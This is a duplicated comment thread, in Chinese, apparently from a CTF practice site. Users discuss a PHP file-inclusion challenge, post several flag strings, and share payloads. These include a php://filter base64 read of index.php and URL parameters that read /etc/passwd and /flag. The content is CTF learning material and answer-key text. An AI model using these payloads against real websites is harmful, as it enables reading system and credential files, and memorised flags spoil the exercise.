PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429
????直接/flag就出来了?
没意思,为啥3金币
flag{3f73582017c0a7d0a0d1c937fcb9ccda}
flag{d2fc833912015ef20e29905ab607e995}
flag:flag{2773e5133de5c764209074ecd6cf2a3a}
payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
php://filter伪协议
http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag
...
评论
嵌入式学的CTF 1年前
举报
PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429
xiaoxiao972521 1年前
举报
????直接/flag就出来了?
iwindy 1年前
举报
没意思,为啥3金币
453137 1年前
举报
flag{3f73582017c0a7d0a0d1c937fcb9ccda}
gyc3153616052 2年前
举报
flag{d2fc833912015ef20e29905ab607e995}
llluyan 2年前
举报
flag:flag{2773e5133de5c764209074ecd6cf2a3a}
canxue11 2年前
举报
payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag
HuangYanQwQ 2年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
snickerX 2年前
举报
php://filter伪协议
LHJ2022 2年前
举报
http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag